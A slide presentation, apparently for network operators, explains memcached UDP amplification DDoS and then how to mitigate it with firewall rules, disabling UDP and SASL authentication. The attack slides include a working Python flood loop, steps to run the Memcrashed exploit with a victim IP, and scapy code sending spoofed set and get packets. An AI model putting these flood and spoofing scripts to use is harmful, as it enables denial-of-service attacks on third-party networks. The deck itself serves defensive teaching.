1. Memcache as UDP Reflectors: A Massive
Amplified DDoS the World
(Attack Formulation and Mitigation)
Presenter
Muhammad Morshed Alam
AmberIT Limited
morshed@amberit.com.bd
<Abror Netwroks> <Shodan Stats>

2. Outlines
• Memcache overview
• Memcache Variables and Commands
• Memcache DDoS Amplification Attack formulation,
Amplification Factor
• Memcache DDoS Tools (set and get requests, spoof UDP
packets)
• Mitigation (securing memcache servers using firewall
and SASL authentication)

3. Memcached Overview
• Free & open source, high-performance, distributed
memory object caching system
• Uses key-value to store arbitrary data (strings, objects)
• Set (key, Data) <= save the data in key
Get(key) => give the data from key
• add, delete and replace commands to strictly
insert/remove data in a key
• Optimizes backend database performance by
temporarily storing information in cache memory

4. Memcached Mitigates the Load from DB
Speed up the Web App Response

5. Install Memcache Service
# sudo apt-get update
# sudo apt-get install memcached
# sudo apt-get install libmemcached-tools
Check the running process:
root@bdnog-memcace:~# ps aux |grep memcache
Output:
memcache 207 0.0 0.1 63388 1952 ? Ssl Apr12 0:02
/usr/bin/memcached -m 64 -p 11211 -u memcache -l
127.0.0.1

6. Install Memcache Service Contd..
Verify open ports with the ss command or netstat
command:
# ss -tulpn | grep :11211
# netstat -tulpn | grep :11211
Configuration file:
# sudo vi /etc/memcached.conf
Service restart process:
# sudo systemctl restart memcached

7. Memcache Variables and Commands:
Connecting to the Memcache service:
root@bdnog-memcace:~# telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats
STAT pid 12476
STAT uptime 20
STAT time 1524726956
STAT version 1.4.25 Ubuntu
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 0.008000
STAT rusage_system 0.004000
STAT curr_connections 1
STAT total_connections 2
STAT connection_structures 2
STAT reserved_fds 20
STAT cmd_get 0
STAT cmd_set 0
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 0
STAT get_misses 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 7
STAT bytes_written 0
STAT limit_maxbytes 67108864
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT
time_in_listen_disabled_us 0
STAT threads 4
STAT conn_yields 0
STAT hash_power_level 16
STAT hash_bytes 524288
STAT hash_is_expanding 0
STAT malloc_fails 0
STAT bytes 0
STAT curr_items 0
STAT total_items 0
STAT expired_unfetched 0
STAT evicted_unfetched 0
STAT evictions 0
STAT reclaimed 0
STAT crawler_reclaimed 0
STAT crawler_items_checked 0
STAT lrutail_reflocked 0
END

8. Memcache-tools and outputs
# Setting data for a Key :
set key 0 3600 16
Welcome to BDNog
STORED
# Getting return the value of key:
get key
VALUE key 0 16
Welcome to BDNog
END
Using of libmemcached-tools command:
root@bdnog-memcace:~# memcstat --servers 127.0.0.1
Output: Give the present status of all memcache variables,
i.e.,
STAT cmd_get 1
STAT cmd_set 1
root@bdnog-memcace:~# memcdump --servers 127.0.0.1
Output: All available keys that holding the data of cache,
i.e.,
Key
root@bdnog-memcace:~# memcat --servers 127.0.0.1 key
Output: return the value of that key, i.e.,
Welcome to BDNog
set <keyname> <some_flag> <expiration_in_millseconds> <length_of_data_to_follow>

9. Vulnerable Memcached Server
• No authentication required to access
• unauthorized inject big payload in cache
• Listen on unreliable UDP/Port 11211 from
any IP address
• UDP allows unreliable data delivery, Target
hosts receive data without prior consent
stats of vulnerable memcached
services available in internet (Qrator
Lab and Akamai)

10. 1. Finds a memcache vulnerable server listening at
UDP , port 11211 and high max size value of the
variable limit_maxbytes
2. Run a memcache SET command and fills 1 key to
it’s max size with data to ensure high payload
3. Sends multiple forged GET requests for that key
using continuous UDP and spoof victim IP
Attacker’s UDP Packets Contained:
•UDP GET key requests
•Size: 15B, SRC IP: spoof Target IP, DST
Port:11211, Des. IP: Memcahe Host
Vulnerable Memcached servers
exposed at Internet and listening
at UDP, Port: 11211
<Victims/Targets>
 GET commands reflected to the victim IP with (key,
value)
 Value of DATA is high, i.e, T. Size=(key, value)*# of
requests
 GET Request 15B=> 750kB response, 50000x
amplification (Akamai Report)
 SRC IP: Memcache host, DST IP: Target, SRC Port:
11211
Attack Formulation

11. 1. Attacker may user multiple vulnerable memcached servers
to a specific target IP by spoofing the SRC IP
2. Target network infra. overwhelmed with UDP Traffic
Memcache Amplification DDoS on bandwidth consumption

12. Trends of Protocols Used for Reflection
Most DDoS counted for Memcache (DDoSmon stats)

13. DDoS attack bandwidth 1.3 Tbps on Github !!!

14. Memcached Reflection Power
Inserting key value to a vulnerable memcached server:
# apt-get install python-memcache
# python
>>> import memcache
>>> mc=memcache.Client([‘1.2.3.4:11211'],debug=True)
>>> mc.set(‘tot2',3423443534324234234234234)
True
>>> mc.get(‘tot2')
3423443534324234234234234
Max Key Value (size) => 1 MB, repeating the get request for 1024 times => 1024 MB (1GB)
reflected UDP Traffic !!!! 

16. Flooding the resource with Reflected UDP Traffic:
# touch get_flood.py
#!/usr/bin/env python
import memcache
mc = memcache.Client([‘202.4.96.85:11211'],debug=True)
mc.set('tot2',1347534875923423432423)
for i in range(10000):
mc.get('tot2')
print i
root@morshed-Lenovo-G40-70:~#python get_flood.py
MemCached: MemCache: inet:202.4.96.85:11211: connect: timed
out. Marking dead.

17. Dump Packets:
Memcache ServerGet Requests Sender

18. Dump Output Packets:

19. Dump Output Packets (PPS Curve) :

20. Memcached DDoS Tools
Sends forged UDP packets (Spoof the SRC IP/Target IP) to vulnerable
Memcached servers obtained using Shodan API
# git clone https://github.com/649/Memcrashed-DDoS-Exploit.git
# apt-get install python3
# pip install shodan ;search engine
# pip install scapy ; require to manipulate UDP packets
Pass the API key collected from https://account.shodan.io/login and put the
target victim IP address to run the attack
# python3 Memcrashed.py
;x00injected is the key and some arbitary value in inserted to cache
setdata = ("x00x00x00x00x00x00x00x00setx00injectedx000x003600x00%srn%srn"
getdata = ("x00x00x00x00x00x00x00x00getx00injectedrn")
;using scapy SRC IP manupluation and sending get request on behalf of
victim/Target IP
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata)
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata)

21. Dump Data:

22. Mitigation

23. Step-1: Configuring The Firewall:
For TCP:
# /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
For UDP:
# /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Or permanently Disable for zimbra colaboration:
# /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP
# /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP
Note: Save the iptables rules and check the rules
# iptables –L -v -n
Secure memcached server to avoid DDoS amplification attacks

24. Step-2: Changing the Configuration:
# sudo vim /etc/memcached.conf
-l 127.0.0.1,172.16.3.1 ;listening from localhost and
trusted block
-U 0 ;disable UDP 11211 listening
# sudo systemctl restart memcached
Secure memcached server to avoid DDoS amplification
attacks contd…

25. Validation of filtering rules:
# nc 202.4.96.144 11211
# nc -u 202.4.96.144 11211
# telnet 202.4.96.144 11211
# sudo nmap 202.4.96.144 -p 11211 -sU -sS --script memcached-
info

26. Adding Authorized user using SASL to Memcached Server:
# memcstat --servers="127.0.0.1“
Output:
Server: 127.0.0.1 (11211)
pid: 3831
uptime: 9
time: 1520028517, version: 1.4.25 . . .
SASL helps to add authentication for memcached servers clients.
# sudo vim /etc/memcached.conf
-S ;enable SASL
-vv ;enable verbose output to /var/log/memcached
Save and close the file.
# sudo systemctl restart memcached
# sudo journalctl -u memcached
Output:
Apr 27 22:03:58 memcached systemd-memcached-wrapper[2760]: Initialized SASL.

27. Adding Authorized user using SASL to Memcached Server:
# sudo apt-get install sasl2-bin ; SASL user database
# sudo mkdir -p /etc/sasl2
# sudo vi /etc/sasl2/memcached.conf
mech_list: plain
log_level: 5
sasldb_path: /etc/sasl2/memcached-sasldb2
# sudo saslpasswd2 -a memcached -c -f /etc/sasl2/memcached-
sasldb2 morshed
# sudo systemctl restart memcached
# memcstat --servers="127.0.0.1" --username=morshed --password=*passwd*